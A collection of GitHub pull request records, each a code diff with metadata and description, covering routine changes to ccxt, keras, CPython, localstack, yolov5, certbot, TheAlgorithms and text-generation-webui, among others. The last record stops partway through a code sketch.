index 3abbdaafe6a7..c8932d6d8334 100644 --- a/js/hitbtc3.js +++ b/js/hitbtc3.js @@ -2266,6 +2266,15 @@ module.exports = class hitbtc3 extends Exchange { } async addMargin (symbol, amount, params = {}) { + /** + * @method + * @name hitbtc3#addMargin + * @description add margin + * @param {str} symbol unified market symbol + * @param {float} amount amount of margin to add + * @param {dict} params extra parameters specific to the hitbtc3 api endpoint + * @returns {dict} a [margin structure]{@link https://docs.ccxt.com/en/latest/manual.html#add-margin-structure} + */ return await this.modifyMarginHelper (symbol, amount, 'add', params); } diff --git a/js/kucoinfutures.js b/js/kucoinfutures.js index aef9b03a61f7..699386030fc1 100644 --- a/js/kucoinfutures.js +++ b/js/kucoinfutures.js @@ -1143,6 +1143,15 @@ module.exports = class kucoinfutures extends kucoin { } async addMargin (symbol, amount, params = {}) { + /** + * @method + * @name kucoinfutures#addMargin + * @description add margin + * @param {str} symbol unified market symbol + * @param {float} amount amount of margin to add + * @param {dict} params extra parameters specific to the kucoinfutures api endpoint + * @returns {dict} a [margin structure]{@link https://docs.ccxt.com/en/latest/manual.html#add-margin-structure} + */ await this.loadMarkets (); const market = this.market (symbol); const uuid = this.uuid (); diff --git a/js/mexc.js b/js/mexc.js index 7f79f6da72af..ee1e3499c614 100644 --- a/js/mexc.js +++ b/js/mexc.js @@ -2745,6 +2745,15 @@ module.exports = class mexc extends Exchange { } async addMargin (symbol, amount, params = {}) { + /** + * @method + * @name mexc#addMargin + * @description add margin + * @param {str} symbol unified market symbol + * @param {float} amount amount of margin to add + * @param {dict} params extra parameters specific to the mexc api endpoint + * @returns {dict} a [margin structure]{@link https://docs.ccxt.com/en/latest/manual.html#add-margin-structure} + */ return await this.modifyMarginHelper (symbol, amount, 'ADD', params); } diff --git a/js/mexc3.js b/js/mexc3.js index bcbd31ad52a0..848e37f812eb 100644 --- a/js/mexc3.js +++ b/js/mexc3.js @@ -2751,6 +2751,15 @@ module.exports = class mexc3 extends Exchange { } async addMargin (symbol, amount, params = {}) { + /** + * @method + * @name mexc3#addMargin + * @description add margin + * @param {str} symbol unified market symbol + * @param {float} amount amount of margin to add + * @param {dict} params extra parameters specific to the mexc3 api endpoint + * @returns {dict} a [margin structure]{@link https://docs.ccxt.com/en/latest/manual.html#add-margin-structure} + */ return await this.modifyMarginHelper (symbol, amount, 'ADD', params); } diff --git a/js/okx.js b/js/okx.js index 61b29fa8eb52..84c576684828 100644 --- a/js/okx.js +++ b/js/okx.js @@ -4705,6 +4705,15 @@ module.exports = class okx extends Exchange { } async addMargin (symbol, amount, params = {}) { + /** + * @method + * @name okx#addMargin + * @description add margin + * @param {str} symbol unified market symbol + * @param {float} amount amount of margin to add + * @param {dict} params extra parameters specific to the okx api endpoint + * @returns {dict} a [margin structure]{@link https://docs.ccxt.com/en/latest/manual.html#add-margin-structure} + */ return await this.modifyMarginHelper (symbol, amount, 'add', params); } diff --git a/js/zb.js b/js/zb.js index ea07a259fccd..e0bc0f455fe7 100644 --- a/js/zb.js +++ b/js/zb.js @@ -4008,6 +4008,15 @@ module.exports = class zb extends Exchange { } 
async addMargin (symbol, amount, params = {}) { + /** + * @method + * @name zb#addMargin + * @description add margin + * @param {str} symbol unified market symbol + * @param {float} amount amount of margin to add + * @param {dict} params extra parameters specific to the zb api endpoint + * @returns {dict} a [margin structure]{@link https://docs.ccxt.com/en/latest/manual.html#add-margin-structure} + */ if (params['positionsId'] === undefined) { throw new ArgumentsRequired (this.id + ' addMargin() requires a positionsId argument in the params'); }
https://api.github.com/repos/ccxt/ccxt/pulls/13632
2022-06-06T12:51:45Z
2022-06-07T02:48:48Z
2022-06-07T02:48:48Z
2022-06-07T04:51:27Z
2,456
ccxt/ccxt
13,762
Speed up Travis tests
diff --git a/.travis.yml b/.travis.yml index cd41d57db44..d52eb878d67 100644 --- a/.travis.yml +++ b/.travis.yml @@ -38,10 +38,10 @@ install: # Useful for debugging any issues with conda - conda info -a - - conda create -q -n test-environment python=$TRAVIS_PYTHON_VERSION numpy nose scipy matplotlib pandas pytest h5py + - conda create -q -n test-environment python=$TRAVIS_PYTHON_VERSION pytest pandas - source activate test-environment + - pip install --only-binary=numpy,scipy numpy nose scipy matplotlib h5py theano - conda install mkl mkl-service - - pip install theano # set library path - export LD_LIBRARY_PATH=$HOME/miniconda/envs/test-environment/lib/:$LD_LIBRARY_PATH
https://api.github.com/repos/keras-team/keras/pulls/9386
2018-02-14T02:21:43Z
2018-02-15T18:08:28Z
2018-02-15T18:08:28Z
2018-02-16T03:34:36Z
208
keras-team/keras
47,057
bpo-1635741: Fix unicode_dealloc() for mortal interned string
diff --git a/Objects/unicodeobject.c b/Objects/unicodeobject.c index 37e7fe5c0eff26..ca68c57534b229 100644 --- a/Objects/unicodeobject.c +++ b/Objects/unicodeobject.c @@ -1943,13 +1943,20 @@ unicode_dealloc(PyObject *unicode) break; case SSTATE_INTERNED_MORTAL: - /* revive dead object temporarily for DelItem */ - Py_SET_REFCNT(unicode, 3); #ifdef INTERNED_STRINGS + /* Revive the dead object temporarily. PyDict_DelItem() removes two + references (key and value) which were ignored by + PyUnicode_InternInPlace(). Use refcnt=3 rather than refcnt=2 + to prevent calling unicode_dealloc() again. Adjust refcnt after + PyDict_DelItem(). */ + assert(Py_REFCNT(unicode) == 0); + Py_SET_REFCNT(unicode, 3); if (PyDict_DelItem(interned, unicode) != 0) { _PyErr_WriteUnraisableMsg("deletion of interned string failed", NULL); } + assert(Py_REFCNT(unicode) == 1); + Py_SET_REFCNT(unicode, 0); #endif break; @@ -15710,8 +15717,9 @@ PyUnicode_InternInPlace(PyObject **p) return; } - /* The two references in interned are not counted by refcnt. - The deallocator will take care of this */ + /* The two references in interned dict (key and value) are not counted by + refcnt. unicode_dealloc() and _PyUnicode_ClearInterned() take care of + this. */ Py_SET_REFCNT(s, Py_REFCNT(s) - 2); _PyUnicode_STATE(s).interned = SSTATE_INTERNED_MORTAL; #endif @@ -15780,6 +15788,8 @@ _PyUnicode_ClearInterned(PyThreadState *tstate) #endif break; case SSTATE_INTERNED_MORTAL: + // Restore the two references (key and value) ignored + // by PyUnicode_InternInPlace(). Py_SET_REFCNT(s, Py_REFCNT(s) + 2); #ifdef INTERNED_STATS mortal_size += PyUnicode_GET_LENGTH(s);
When unicode_dealloc() is called on a mortal interned string, the string reference counter is now reset at zero, rather than leaking one reference. <!-- Thanks for your contribution! Please read this comment in its entirety. It's quite important. # Pull Request title It should be in the following format: ``` bpo-NNNN: Summary of the changes made ``` Where: bpo-NNNN refers to the issue number in the https://bugs.python.org. Most PRs will require an issue number. Trivial changes, like fixing a typo, do not need an issue. # Backport Pull Request title If this is a backport PR (PR made against branches other than `master`), please ensure that the PR title is in the following format: ``` [X.Y] <title from the original PR> (GH-NNNN) ``` Where: [X.Y] is the branch name, e.g. [3.6]. GH-NNNN refers to the PR number from `master`. --> <!-- issue-number: [bpo-1635741](https://bugs.python.org/issue1635741) --> https://bugs.python.org/issue1635741 <!-- /issue-number -->
https://api.github.com/repos/python/cpython/pulls/21270
2020-07-01T23:21:20Z
2020-07-03T14:59:13Z
2020-07-03T14:59:13Z
2020-07-03T14:59:41Z
548
python/cpython
4,784
small typo fix
diff --git a/fileinfo.py b/fileinfo.py index 389a0a0aac..d5c200b9e5 100644 --- a/fileinfo.py +++ b/fileinfo.py @@ -28,7 +28,7 @@ print ("\nNameError : [%s] No such file or directory\n", file_name) if try_count == 0: - print ("Trial limit exceded \nExiting program") + print ("Trial limit exceeded \nExiting program") sys.exit() # create a dictionary to hold file info
from 'exceded' to 'exceeded'
https://api.github.com/repos/geekcomputers/Python/pulls/192
2017-07-06T11:15:52Z
2017-07-06T21:26:22Z
2017-07-06T21:26:22Z
2017-07-06T21:26:22Z
124
geekcomputers/Python
31,322
fixed broken link to community edition (versions)
diff --git a/README.md b/README.md index c22c675a27..240d03a698 100644 --- a/README.md +++ b/README.md @@ -12,7 +12,7 @@ Manim is an engine for precise programmatic animations, designed for creating explanatory math videos. -Note, there are two versions of manim. This repository began as a personal project by the author of [3Blue1Brown](https://www.3blue1brown.com/) for the purpose of animating those videos, with video-specific code available [here](https://github.com/3b1b/videos). In 2020 a group of developers forked it into what is now the [community edition](https://github.com/ManimCommunity/manim/), with a goal of being more stable, better tested, quicker to respond to community contributions, and all around friendlier to get started with. See [this page](https://docs.manim.community/en/stable/installation/versions.html?highlight=OpenGL#which-version-to-use) for more details. +Note, there are two versions of manim. This repository began as a personal project by the author of [3Blue1Brown](https://www.3blue1brown.com/) for the purpose of animating those videos, with video-specific code available [here](https://github.com/3b1b/videos). In 2020 a group of developers forked it into what is now the [community edition](https://github.com/ManimCommunity/manim/), with a goal of being more stable, better tested, quicker to respond to community contributions, and all around friendlier to get started with. See [this page](https://docs.manim.community/en/stable/faq/installation.html#different-versions) for more details. ## Installation > **WARNING:** These instructions are for ManimGL _only_. Trying to use these instructions to install [ManimCommunity/manim](https://github.com/ManimCommunity/manim) or instructions there to install this version will cause problems. You should first decide which version you wish to install, then only follow the instructions for your desired version.
<!-- Thanks for contributing to manim! Please ensure that your pull request works with the latest version of manim. --> ## Motivation <!-- Outline your motivation: In what way do your changes improve the library? --> ## Proposed changes <!-- What you changed in those files --> - - - ## Test <!-- How do you test your changes --> **Code**: **Result**:
https://api.github.com/repos/3b1b/manim/pulls/1840
2022-07-17T09:39:27Z
2022-07-17T10:08:44Z
2022-07-17T10:08:44Z
2022-07-17T10:08:44Z
464
3b1b/manim
18,324
Clean up deprecated Java libs for STS integration with Kinesis client
diff --git a/localstack/constants.py b/localstack/constants.py index 80565c1f97f5a..a24ac0c163cf8 100644 --- a/localstack/constants.py +++ b/localstack/constants.py @@ -137,9 +137,6 @@ ELASTICMQ_JAR_URL = ( "https://s3-eu-west-1.amazonaws.com/softwaremill-public/elasticmq-server-1.1.0.jar" ) -STS_JAR_URL = ( - f"{MAVEN_REPO_URL}/com/amazonaws/aws-java-sdk-sts/1.11.14/aws-java-sdk-sts-1.11.14.jar" -) STEPFUNCTIONS_ZIP_URL = "https://s3.amazonaws.com/stepfunctionslocal/StepFunctionsLocal.zip" KMS_URL_PATTERN = "https://s3-eu-west-2.amazonaws.com/local-kms/3/local-kms_<arch>.bin" diff --git a/localstack/services/install.py b/localstack/services/install.py index 3af3ee0fc3eed..d9bdd3f277ce8 100644 --- a/localstack/services/install.py +++ b/localstack/services/install.py @@ -32,10 +32,8 @@ LIBSQLITE_AARCH64_URL, LOCALSTACK_MAVEN_VERSION, MAVEN_REPO_URL, - MODULE_MAIN_PATH, OPENSEARCH_DEFAULT_VERSION, OPENSEARCH_PLUGIN_LIST, - STS_JAR_URL, ) from localstack.runtime import hooks from localstack.utils.archives import untar, unzip @@ -51,7 +49,7 @@ ) from localstack.utils.functions import run_safe from localstack.utils.http import download -from localstack.utils.platform import get_arch, is_mac_os, is_windows +from localstack.utils.platform import get_arch, is_mac_os from localstack.utils.run import run from localstack.utils.sync import retry from localstack.utils.threads import parallelize @@ -653,30 +651,6 @@ def upgrade_jar_file(base_dir: str, file_glob: str, maven_asset: str): download(maven_asset_url, target_file) -def install_amazon_kinesis_client_libs(): - # install KCL/STS JAR files - if not os.path.exists(INSTALL_PATH_KCL_JAR): - mkdir(INSTALL_DIR_KCL) - tmp_archive = os.path.join(tempfile.gettempdir(), "aws-java-sdk-sts.jar") - if not os.path.exists(tmp_archive): - download(STS_JAR_URL, tmp_archive) - shutil.copy(tmp_archive, INSTALL_DIR_KCL) - - # Compile Java files - from localstack.utils.kinesis import kclipy_helper - - classpath = kclipy_helper.get_kcl_classpath() - - if is_windows(): - classpath = re.sub(r":([^\\])", r";\1", classpath) - java_files = f"{MODULE_MAIN_PATH}/utils/kinesis/java/cloud/localstack/*.java" - class_files = f"{MODULE_MAIN_PATH}/utils/kinesis/java/cloud/localstack/*.class" - if not glob.glob(class_files): - run( - f'javac -source {JAVAC_TARGET_VERSION} -target {JAVAC_TARGET_VERSION} -cp "{classpath}" {java_files}' - ) - - def install_lambda_java_libs(): # install LocalStack "fat" JAR file (contains all dependencies) if not os.path.exists(INSTALL_PATH_LOCALSTACK_FAT_JAR): @@ -874,7 +848,6 @@ def get_installer(self) -> List[Installer]: ("elasticsearch", install_elasticsearch), ("opensearch", install_opensearch), ("kinesalite", install_kinesalite), - ("kinesis-client-libs", install_amazon_kinesis_client_libs), ("kinesis-mock", install_kinesis_mock), ("lambda-java-libs", install_lambda_java_libs), ("local-kms", install_local_kms), @@ -920,7 +893,6 @@ def main(): install_all_components() if sys.argv[1] in ("libs", "testlibs"): # Install additional libraries for testing - install_amazon_kinesis_client_libs() install_lambda_java_testlibs() print("Done.") diff --git a/localstack/utils/kinesis/java/cloud/localstack/DefaultSTSAssumeRoleSessionCredentialsProvider.java b/localstack/utils/kinesis/java/cloud/localstack/DefaultSTSAssumeRoleSessionCredentialsProvider.java deleted file mode 100644 index fa40be599ab76..0000000000000 --- a/localstack/utils/kinesis/java/cloud/localstack/DefaultSTSAssumeRoleSessionCredentialsProvider.java +++ /dev/null @@ -1,59 +0,0 @@ -// TODO: 
double-check - can potentially be removed! - -package cloud.localstack; - -import java.util.Map; - -import com.amazonaws.auth.AWSCredentialsProvider; -import com.amazonaws.auth.BasicSessionCredentials; -import com.amazonaws.auth.InstanceProfileCredentialsProvider; -import com.amazonaws.auth.STSAssumeRoleSessionCredentialsProvider; -import com.amazonaws.auth.AWSStaticCredentialsProvider; - -/** - * Custom session credentials provider that can be configured to assume a given IAM role. - * Configure the role to assume via the following environment variables: - * - AWS_ASSUME_ROLE_ARN : ARN of the role to assume - * - AWS_ASSUME_ROLE_SESSION_NAME : name of the session to be used when calling assume-role - * - * As long lived credentials, this credentials provider attempts to uses the following: - * - an STS token, via environment variables AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY, AWS_SESSION_TOKEN - * - instance profile credentials provider (see Google hits for "EC2 instance metadata service") - * - * TODO: Potentially we could simply use the default credentials provider to obtain the long-lived credentials. - * - * @author Waldemar Hummer - */ -public class DefaultSTSAssumeRoleSessionCredentialsProvider extends STSAssumeRoleSessionCredentialsProvider { - - public DefaultSTSAssumeRoleSessionCredentialsProvider() { - super(getLongLivedCredentialsProvider(), getDefaultRoleARN(), getDefaultRoleSessionName()); - } - - private static String getDefaultRoleARN() { - Map<String, String> env = System.getenv(); - return env.get("AWS_ASSUME_ROLE_ARN"); - } - - private static String getDefaultRoleSessionName() { - Map<String, String> env = System.getenv(); - return env.get("AWS_ASSUME_ROLE_SESSION_NAME"); - } - - private static AWSCredentialsProvider getLongLivedCredentialsProvider() { - Map<String, String> env = System.getenv(); - if(env.containsKey("AWS_SESSION_TOKEN")) { - return new AWSStaticCredentialsProvider( - new BasicSessionCredentials( - env.get("AWS_ACCESS_KEY_ID"), - env.get("AWS_SECRET_ACCESS_KEY"), - env.get("AWS_SESSION_TOKEN"))); - } - return new InstanceProfileCredentialsProvider(false); - } - - public static void main(String args[]) throws Exception { - System.out.println(new DefaultSTSAssumeRoleSessionCredentialsProvider().getCredentials()); - } - -} diff --git a/localstack/utils/kinesis/kinesis_connector.py b/localstack/utils/kinesis/kinesis_connector.py index feff2bd10f9b9..c562eaab7a751 100644 --- a/localstack/utils/kinesis/kinesis_connector.py +++ b/localstack/utils/kinesis/kinesis_connector.py @@ -307,7 +307,7 @@ def get_stream_info( def start_kcl_client_process( - stream_name, + stream_name: str, listener_script, log_file=None, env=None, @@ -328,26 +328,8 @@ def start_kcl_client_process( env = aws_stack.get_environment(env) # make sure to convert stream ARN to stream name stream_name = aws_stack.kinesis_stream_name(stream_name) - # decide which credentials provider to use - credentialsProvider = None - if ("AWS_ASSUME_ROLE_ARN" in os.environ or "AWS_ASSUME_ROLE_ARN" in env_vars) and ( - "AWS_ASSUME_ROLE_SESSION_NAME" in os.environ or "AWS_ASSUME_ROLE_SESSION_NAME" in env_vars - ): - # use special credentials provider that can assume IAM roles and handle temporary STS auth tokens - credentialsProvider = "cloud.localstack.DefaultSTSAssumeRoleSessionCredentialsProvider" - # pass through env variables to child process - for var_name in [ - "AWS_ASSUME_ROLE_ARN", - "AWS_ASSUME_ROLE_SESSION_NAME", - "AWS_ACCESS_KEY_ID", - "AWS_SECRET_ACCESS_KEY", - "AWS_SESSION_TOKEN", - ]: - if 
var_name in os.environ and var_name not in env_vars: - env_vars[var_name] = os.environ[var_name] if aws_stack.is_local_env(env): - # need to disable CBOR protocol, enforce use of plain JSON, - # see https://github.com/mhart/kinesalite/issues/31 + # disable CBOR protocol, enforce use of plain JSON env_vars["AWS_CBOR_DISABLE"] = "true" if kcl_log_level or (len(log_subscribers) > 0): if not log_file: @@ -390,7 +372,6 @@ def start_kcl_client_process( executableName=listener_script, streamName=stream_name, applicationName=stream_info["app_name"], - credentialsProvider=credentialsProvider, region_name=region_name, **kwargs, )
Clean up deprecated Java libs for STS integration with Kinesis client. 🧹 This code dates back to the very early days, when parts of the Kinesis client utils were used to connect to Kinesis streams in real AWS (using IAM/STS tokens). This is no longer required today, and should be removed. We have recently also seen some users running into issues with the Java compilation in local dev mode - removing it should hopefully simplify the installation a bit further.
https://api.github.com/repos/localstack/localstack/pulls/6856
2022-09-12T09:41:48Z
2022-09-12T15:14:00Z
2022-09-12T15:14:00Z
2022-09-12T15:14:02Z
2,075
localstack/localstack
29,230
Adding a file for listing relevant research papers
diff --git a/docs/research/README.md b/docs/research/README.md new file mode 100644 index 0000000000..498a858b2a --- /dev/null +++ b/docs/research/README.md @@ -0,0 +1,23 @@ +# Research + +This page lists research papers that are relevant to the project. + +## Automatically Generating Instruction Data for Training + +This line of work is about significantly reducing the need for manually annotated data for the purpose of training [instruction-aligned](https://openai.com/blog/instruction-following/) language models. + +### SELF-INSTRUCT: Aligning Language Model with Self Generated Instructions [[ArXiv](https://arxiv.org/pdf/2212.10560.pdf)], [[Github](https://github.com/yizhongw/self-instruct)]. + +> We introduce SELF-INSTRUCT, a framework for improving the instruction-following capabilities of pretrained language models by bootstrapping off its own generations. +> Our pipeline generates instruction, input, and output samples from a language model, then prunes them before using them to finetune the original model. +> Applying our method to vanilla GPT3, we demonstrate a 33% absolute improvement over the original model on SuperNaturalInstructions, on par with the performance of InstructGPT-0011, which is trained with private user data and human annotations. + +### Tuning Language Models with (Almost) No Human Labor. [[ArXiv](https://arxiv.org/pdf/2212.09689.pdf)], [[Github](https://github.com/orhonovich/unnatural-instructions)]. + +> In this work, we introduce +> Unnatural Instructions: a large dataset of creative and diverse instructions, collected with virtually no human labor. +> We collect 64,000 examples by prompting a language model with three seed examples of instructions and eliciting a fourth. +> This set is then expanded by prompting the model to rephrase each instruction, creating a total of approximately 240,000 examples of instructions, inputs, and outputs. +> Experiments show that despite containing a fair amount of noise, training on Unnatural Instructions rivals the effectiveness of training +> on open-source manually-curated datasets, surpassing the performance of models such as +> T0++ and Tk-Instruct across various benchmarks.
Specifically, adding methods for automatically generating instruction training data.
https://api.github.com/repos/LAION-AI/Open-Assistant/pulls/217
2022-12-31T21:45:12Z
2023-01-01T16:47:39Z
2023-01-01T16:47:39Z
2023-01-01T16:47:39Z
497
LAION-AI/Open-Assistant
37,435
Autosplit
diff --git a/utils/datasets.py b/utils/datasets.py index 7466ba48b27..eb355e913b8 100755 --- a/utils/datasets.py +++ b/utils/datasets.py @@ -902,3 +902,20 @@ def flatten_recursive(path='../coco128'): create_folder(new_path) for file in tqdm(glob.glob(str(Path(path)) + '/**/*.*', recursive=True)): shutil.copyfile(file, new_path / Path(file).name) + + +def autosplit(path='../coco128', weights=(0.9, 0.1, 0.0)): # from utils.datasets import *; autosplit() + """ Autosplit a dataset into train/val/test splits and save *.txt files + # Arguments + path: Path to images directory + weights: Train, val, test weights (list) + """ + path = Path(path) # images dir + files = list(path.rglob('*.*')) + indices = random.choices([0, 1, 2], weights=weights, k=len(files)) # assign each image to a split + txt = ['autosplit_train.txt', 'autosplit_val.txt', 'autosplit_test.txt'] # 3 txt files + [(path / x).unlink() for x in txt if (path / x).exists()] # remove existing + for i, img in tqdm(zip(indices, files)): + if img.suffix[1:] in img_formats: + with open(path / txt[i], 'a') as f: + f.write(str(img) + '\n') # add image to txt file
This PR implements an Autosplit function addition. This new function automatically splits a dataset into train/val/test splits. ## 🛠️ PR Summary <sub>Made with ❤️ by [Ultralytics Actions](https://github.com/ultralytics/actions)<sub> ### 🌟 Summary Introducing an automatic dataset splitting function to the YOLOv5 repository. ### 📊 Key Changes - Added the `autosplit` function within `datasets.py`. - The function divides a dataset into training, validation, and test sets based on specified weights. - It generates three text files (`autosplit_train.txt`, `autosplit_val.txt`, `autosplit_test.txt`) to store lists of the file paths for each split. - Existing split text files are removed before creating new ones to avoid duplication. ### 🎯 Purpose & Impact - **Ease of Use:** Simplifies the process of creating train/val/test splits, making it easier for users to prepare their datasets. - **Flexibility:** Allows users to define their own split ratios through the `weights` parameter. - **Efficiency:** Automatically handles the creation and cleaning up of split files, saving time and reducing manual errors. - **Potential Impact:** Could improve overall data management practices and reproducibility of experiments for YOLOv5 users. 🚀
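A minimal usage sketch of the new helper, based on the signature shown in the diff above; the dataset path and split weights are simply the defaults from that signature, used here for illustration:

```python
# Usage sketch for the new autosplit helper (paths and weights are illustrative).
# The diff's own inline comment suggests it is meant to be run as:
#   from utils.datasets import *; autosplit()
from utils.datasets import autosplit

# Split ../coco128 into 90% train / 10% val / 0% test. This writes
# autosplit_train.txt, autosplit_val.txt and autosplit_test.txt next to the images,
# removing any existing split files first.
autosplit(path='../coco128', weights=(0.9, 0.1, 0.0))
```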
https://api.github.com/repos/ultralytics/yolov5/pulls/1488
2020-11-23T16:17:55Z
2020-11-23T16:18:22Z
2020-11-23T16:18:22Z
2024-01-19T20:20:46Z
368
ultralytics/yolov5
25,150
Turn off cancel notifications
diff --git a/.travis.yml b/.travis.yml index 370137f68d7..96c6fe414aa 100644 --- a/.travis.yml +++ b/.travis.yml @@ -105,6 +105,7 @@ notifications: irc: channels: - secure: "SGWZl3ownKx9xKVV2VnGt7DqkTmutJ89oJV9tjKhSs84kLijU6EYdPnllqISpfHMTxXflNZuxtGo0wTDYHXBuZL47w1O32W6nzuXdra5zC+i4sYQwYULUsyfOv9gJX8zWAULiK0Z3r0oho45U+FR5ZN6TPCidi8/eGU+EEPwaAw=" + on_cancel: never on_success: never on_failure: always use_notice: true
By default, Travis cancels builds on branches and PRs if another commit lands in favor of running tests on that. See https://blog.travis-ci.com/2017-09-21-default-auto-cancellation. I think this behavior is good as it stops us spending resources testing out of date code, but with our current setup, it causes Travis to send us notifications when builds are automatically canceled on master. This PR changes that by not sending out notifications when a build gets canceled.
https://api.github.com/repos/certbot/certbot/pulls/5918
2018-05-02T19:36:13Z
2018-05-23T20:57:22Z
2018-05-23T20:57:22Z
2018-05-23T20:57:25Z
221
certbot/certbot
3,478
Fix mypy error at maths
diff --git a/maths/greedy_coin_change.py b/maths/greedy_coin_change.py index 5a7d9e8d84ae..5233ee1cbc12 100644 --- a/maths/greedy_coin_change.py +++ b/maths/greedy_coin_change.py @@ -41,7 +41,7 @@ """ -def find_minimum_change(denominations: list[int], value: int) -> list[int]: +def find_minimum_change(denominations: list[int], value: str) -> list[int]: """ Find the minimum change from the given denominations and value >>> find_minimum_change([1, 5, 10, 20, 50, 100, 200, 500, 1000,2000], 18745) @@ -75,7 +75,7 @@ def find_minimum_change(denominations: list[int], value: int) -> list[int]: if __name__ == "__main__": denominations = list() - value = 0 + value = "0" if ( input("Do you want to enter your denominations ? (yY/n): ").strip().lower() diff --git a/maths/triplet_sum.py b/maths/triplet_sum.py index 22fab17d30c2..af77ed145bce 100644 --- a/maths/triplet_sum.py +++ b/maths/triplet_sum.py @@ -19,7 +19,7 @@ def make_dataset() -> tuple[list[int], int]: dataset = make_dataset() -def triplet_sum1(arr: list[int], target: int) -> tuple[int, int, int]: +def triplet_sum1(arr: list[int], target: int) -> tuple[int, ...]: """ Returns a triplet in the array with sum equal to target, else (0, 0, 0). diff --git a/maths/two_sum.py b/maths/two_sum.py index 5209acbc7e44..12ad332d6c4e 100644 --- a/maths/two_sum.py +++ b/maths/two_sum.py @@ -31,7 +31,7 @@ def two_sum(nums: list[int], target: int) -> list[int]: >>> two_sum([3 * i for i in range(10)], 19) [] """ - chk_map = {} + chk_map: dict[int, int] = {} for index, val in enumerate(nums): compl = target - val if compl in chk_map:
Related issue #4052 ### **Describe your change:** * [ ] Add an algorithm? * [x] Fix a bug or typo in an existing algorithm? * [ ] Documentation change? ### **Checklist:** * [x] I have read [CONTRIBUTING.md](https://github.com/TheAlgorithms/Python/blob/master/CONTRIBUTING.md). * [x] This pull request is all my own work -- I have not plagiarized. * [x] I know that pull requests will not be merged if they fail the automated tests. * [x] This PR only changes one algorithm file. To ease review, please open separate PRs for separate algorithms. * [x] All new Python files are placed inside an existing directory. * [x] All filenames are in all lowercase characters with no spaces or dashes. * [x] All functions and variable names follow Python naming conventions. * [x] All function parameters and return values are annotated with Python [type hints](https://docs.python.org/3/library/typing.html). * [x] All functions have [doctests](https://docs.python.org/3/library/doctest.html) that pass the automated testing. * [x] All new algorithms have a URL in its comments that points to Wikipedia or other similar explanation. * [x] If this pull request resolves one or more open issues then the commit message contains `Fixes: #{$ISSUE_NO}`.
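To illustrate the kind of fix applied in `maths/two_sum.py`, here is a small sketch of the annotated-empty-dict pattern; the loop body is the standard two-sum approach and is only assumed to match the repository file:

```python
# Sketch of the pattern the annotation is applied to in maths/two_sum.py.
# Built-in generics like dict[int, int] follow the style already used in the diff
# (Python 3.9+).
def two_sum(nums: list[int], target: int) -> list[int]:
    # Annotating the empty dict tells mypy the key/value types up front;
    # without it, mypy can report an error such as
    # "Need type annotation for 'chk_map'".
    chk_map: dict[int, int] = {}
    for index, val in enumerate(nums):
        compl = target - val
        if compl in chk_map:
            return [chk_map[compl], index]
        chk_map[val] = index
    return []


print(two_sum([2, 7, 11, 15], 9))  # [0, 1]
```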
https://api.github.com/repos/TheAlgorithms/Python/pulls/4613
2021-08-15T04:46:15Z
2021-08-15T19:15:53Z
2021-08-15T19:15:53Z
2021-08-18T11:25:15Z
562
TheAlgorithms/Python
29,923
Fix exllama tokenizers
diff --git a/modules/exllama.py b/modules/exllama.py index 177f028f3c..f3894b7a72 100644 --- a/modules/exllama.py +++ b/modules/exllama.py @@ -1,5 +1,6 @@ from pathlib import Path +import torch import torch.nn.functional as F from torch import version as torch_version @@ -111,7 +112,7 @@ def generate_with_streaming(self, prompt, state): if state['custom_token_bans']: to_ban = [int(x) for x in state['custom_token_bans'].split(',')] if len(to_ban) > 0: - self.generator.disallow_tokens(self.tokenizer, to_ban) + self.generator.disallow_tokens(to_ban) # Case 1: no CFG if state['guidance_scale'] == 1: @@ -119,6 +120,11 @@ def generate_with_streaming(self, prompt, state): # Tokenizing the input ids = self.generator.tokenizer.encode(prompt, max_seq_len=self.model.config.max_seq_len) + if state['add_bos_token']: + ids = torch.cat( + [torch.tensor([[self.tokenizer.bos_token_id]]).to(ids.device), + ids], dim=1 + ).to(torch.int64) ids = ids[:, -get_max_prompt_length(state):] if state['auto_max_new_tokens']: max_new_tokens = state['truncation_length'] - ids.shape[-1] @@ -148,7 +154,12 @@ def generate_with_streaming(self, prompt, state): alpha = state['guidance_scale'] prompts = [prompt, state['negative_prompt'] or ''] - ids, mask = self.tokenizer.encode(prompts, return_mask=True, max_seq_len=self.model.config.max_seq_len) + ids, mask = self.tokenizer.encode( + prompts, + return_mask=True, + max_seq_len=self.model.config.max_seq_len, + add_bos=state['add_bos_token'] + ) if state['auto_max_new_tokens']: max_new_tokens = state['truncation_length'] - ids[0].shape[-1] else: @@ -188,7 +199,12 @@ def generate(self, prompt, state): return output def encode(self, string, **kwargs): - return self.tokenizer.encode(string, max_seq_len=self.model.config.max_seq_len) + return self.tokenizer.encode(string, max_seq_len=self.model.config.max_seq_len, add_bos=True) - def decode(self, string, **kwargs): - return self.tokenizer.decode(string)[0] + def decode(self, ids, **kwargs): + if isinstance(ids, int): + ids = torch.tensor([[ids]]) + elif isinstance(ids, torch.Tensor) and ids.numel() == 1: + ids = ids.view(1, -1) + + return self.tokenizer.decode(ids)[0] diff --git a/modules/exllamav2.py b/modules/exllamav2.py index a325a4d376..0bfe1f7364 100644 --- a/modules/exllamav2.py +++ b/modules/exllamav2.py @@ -48,7 +48,7 @@ def from_pretrained(self, path_to_model): result.cache = cache result.tokenizer = tokenizer result.generator = generator - return result, tokenizer + return result, result def generate_with_streaming(self, prompt, state): settings = ExLlamaV2Sampler.Settings() @@ -65,7 +65,7 @@ def generate_with_streaming(self, prompt, state): if len(to_ban) > 0: settings.disallow_tokens(self.tokenizer, to_ban) - ids = self.tokenizer.encode(prompt) + ids = self.tokenizer.encode(prompt, add_bos=state['add_bos_token']) ids = ids[:, -get_max_prompt_length(state):] initial_len = ids.shape[-1] @@ -104,7 +104,12 @@ def generate(self, prompt, state): return output def encode(self, string, **kwargs): - return self.tokenizer.encode(string) + return self.tokenizer.encode(string, add_bos=True) - def decode(self, string, **kwargs): - return self.tokenizer.decode(string)[0] + def decode(self, ids, **kwargs): + if isinstance(ids, int): + ids = torch.tensor([[ids]]) + elif isinstance(ids, torch.Tensor) and ids.numel() == 1: + ids = ids.view(1, -1) + + return self.tokenizer.decode(ids)[0]
## Checklist: - [ X ] I have read the [Contributing guidelines](https://github.com/oobabooga/text-generation-webui/wiki/Contributing-guidelines). Currently, with exllama, BOS is never added no matter what settings are chosen
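A small sketch of the BOS-prepend pattern introduced by the fix; the token ids and the `bos_token_id` value are made up for illustration and do not come from a real tokenizer:

```python
# Minimal sketch of prepending a BOS token to encoded ids, as in the patched
# generate_with_streaming(). Values are illustrative only.
import torch

bos_token_id = 1                 # assumed BOS id for illustration
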